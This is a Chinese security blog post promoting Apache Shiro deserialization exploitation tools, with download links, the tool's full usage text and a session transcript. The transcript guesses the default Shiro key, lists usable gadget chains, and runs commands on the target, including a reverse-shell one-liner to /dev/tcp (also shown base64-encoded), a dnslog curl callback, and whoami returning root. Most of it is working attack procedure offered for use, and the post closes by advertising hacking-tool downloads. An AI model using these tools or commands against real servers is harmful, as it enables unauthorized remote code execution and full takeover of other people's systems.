免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
Shiro
01
前言
https://github.com/altEr1125/ShiroAttack2
https://github.com/SummerSec/ShiroAttack
https://github.com/wyzxxz/shiro_rce_tool
02
其它链JRMPClient
shiro_tool这款工具可以检测其他不是常规的利用链,看一下这个shiro_tool,还挺多的
download_url:https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20221128/shiro_tool.jar
优化一些功能:
1、spring/tomcat回显,执行命令的时候,x=whoami 就行
2、批量检测是否shiro
3、目标服务器不出网的情况下探测
4、key 目前 401 个。
5、默认会加载当前目录下的 keys.txt 文件,可以把key放到keys.txt里,和该jar放同一个目录,会自动加载。
> java -jar shiro_tool.jar
Usage: java -jar shiro_tool.jar https://xx.xx.xx.xx
nocheck --> skip check target is shiro or not.
skip --> all gadget default can be use
redirect --> follow redirect default:false
randomagent --> random useragent
notcheckall --> not check all gadget
useragent= --> set useragent
cookiename= --> default: rememberMe 不是rememberMe的时候用
x= --> print result
cmd= --> set command to run
dcmd= --> set command to run, command format base64 string
key= --> set a shiro key
req= --> request body file request body file 抓包保存到文件里,这里写文件名
keys= --> keys file 自定义key的文件,key按行分割,即每行写一个
java -cp shiro_tool.jar shiro.Check urls=批量url文件 redirect
java -cp shiro_tool.jar shiro.Check http://www.shiro.com
[//xx.xx.xx.xx/ ] java -jar shiro_tool.jar https:
[//xx.xx.xx.xx/ ] target: https:
[is use shiro ] target
[ ] start guess shiro key.
[ ] shiro key: kPH+bIxk5D2deZiIxcaaaA==
[ ] check URLDNS
[ ] find: URLDNS can be use
[ ] check CommonsBeanutils1
[ ] find: CommonsBeanutils1 can be use
[ ] check CommonsBeanutils2
[ ] check CommonsCollections1
[ ] check CommonsCollections2
[ ] check CommonsCollections3
[ ] check CommonsCollections4
[ ] check CommonsCollections5
[ ] check CommonsCollections6
[ ] check CommonsCollections7
[ ] check CommonsCollections8
[ ] check CommonsCollections9
[ ] check CommonsCollections10
[ ] check CommonsCollectionsK1
[ ] check CommonsCollectionsK2
[ ] check CommonsCollectionsK3
[ ] check CommonsCollectionsK4
[ ] check Groovy1
[ ] find: Groovy1 can be use
[ ] check JSON1
[ ] find: JSON1 can be use
[ ] check Spring1
[ ] find: Spring1 can be use
[ ] check Spring2
[ ] check JRMPClient
[ ] find: JRMPClient can be use
[ ] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener
0: URLDNS
1: CommonsBeanutils1
2: Groovy1
3: JSON1
4: Spring1
5: JRMPClient
[please enter the number(0-6) ]
3
[-] use gadget: JSON1
[*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[*] command example: curl dnslog.xx.com
[*] if need base64 command, input should startwith bash=/powershell=/python=/perl=
[ ] please enter command, input q or quit to quit
> curl json.dnslog.xx.cn
[ ] start process command: curl json.dnslog.xx.cn
[ ] please enter command, input q or quit to quit
> bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[ ] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
[ ] please enter command, input q or quit to quit
> output=on
[on. ] print payload mode
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> whoami
kPH+bIxk5D2deZiIxcaaaA== - CommonsBeanutils1 - zEC2T+ZP+ib2g+NLMrrU0LRsNu3lr7kjq
82987eI8FZxA8ckaX8LsMNHdParxVS9aYg0Oxl91WD5GztG6Dmg/QO/sjxi+kX/sFpHgqwtG4MCQoogH
Jkhnj73PI6Wn8AJWQyXoOGNMkyboGcEm0Ti1h+WMGQEqw57tRl7Pjr0pMr2oZcUj9huwC/Lfr090FX7v
rPrU5JnQm2Qo7ZrMPnxENXs0yMT6HfU75OejeF6kXbWTaGlvfByscF1ljoDR/k2txdQ1eK4nZ4ReOAqM
uUeeaXwirEw2kg58GktvB2Ghw4egXJBQUdP3H8iE+zrkf12YlPs/RAOq8w0mWfvwB7EnCW3Z83YP8vV1
+reLT9oNyUpCfjKyQVodnpZJY7If4F9al8He7E832RR3mhFvsjJDyNFTbB4TPrRqFDehSVuHib5qkh0s
0YjvCGErxDLH9pFS4G9rNYQeAnXBKeNzS5q2O0xCe5xg4X6l8R6XsU2/V1d6wd27U7u18+DJlo/v58vj
SyUtUaEAAuMN9C30Rr+r7Tk9MVC55eS8l82fURpUwttcRADhJ0esKHAFFAkwnisbAb4Uugz3IADojYlH
BNFtWFuV2dsuqkionEROKLIdVHJGR8URmk79v8lbLbpCWI3cTCf81SwwBoYylKXCyHX2X08VlEUvuHWk
ypx9gVvDuQQQFTGP4ljwpU1NlQPqxaLXmnZ5TyJN2sycL9s8VWMYls4uFATtMkpXXcwaQGFVjCzFrABv
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> x=whoami
root
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> quit
[ ] start process command: quit
[ ] quit
03
工具下载
https://github.com/altEr1125/ShiroAttack2
https://github.com/SummerSec/ShiroAttack
https://github.com/wyzxxz/shiro_rce_tool
https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20221128/shiro_tool.jar
来自夜组安全的分享
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...